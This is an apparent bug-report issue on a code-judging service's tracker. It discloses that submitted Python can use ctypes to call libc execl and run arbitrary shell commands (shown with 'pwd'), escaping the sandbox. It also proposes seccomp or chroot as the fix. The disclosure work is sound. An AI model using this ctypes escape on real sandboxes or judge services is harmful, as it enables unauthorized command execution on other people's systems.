[VULN] Python Arbitrary Code Execution
asef18766 opened this issue · comments
Describe the bug
vulnerbility of arbitrary code execution
To Reproduce
Steps to reproduce the behavior:
- produce the following Python code
import ctypes
command = "pwd"
libc = ctypes.CDLL('libc.so.6')
Cexecve=libc.execl
arg0 = ctypes.create_string_buffer(10)
arg1 = ctypes.create_string_buffer(10)
arg2 = ctypes.create_string_buffer(10)
arg3 = ctypes.create_string_buffer(len(command)+1)
arg0.value = b"/bin/sh"
arg1.value = b"sh"
arg2.value = b"-c"
arg3.value = command.encode()
Cexecve(arg0,arg1,arg2,arg3,0)
Expected behavior
return RE state
Current Behavior
return the following format response
{
"score": 0,
"status": 1,
"cases": [
{
"stdout": "/src\n",
"stderr": "",
"exitCode": 0,
"execTime": 17,
"memoryUsage": 8412,
"status": 1
}
]
}
Possible Solution
Add Python seccomp profile or chroot it
rules will be added in next version
fixed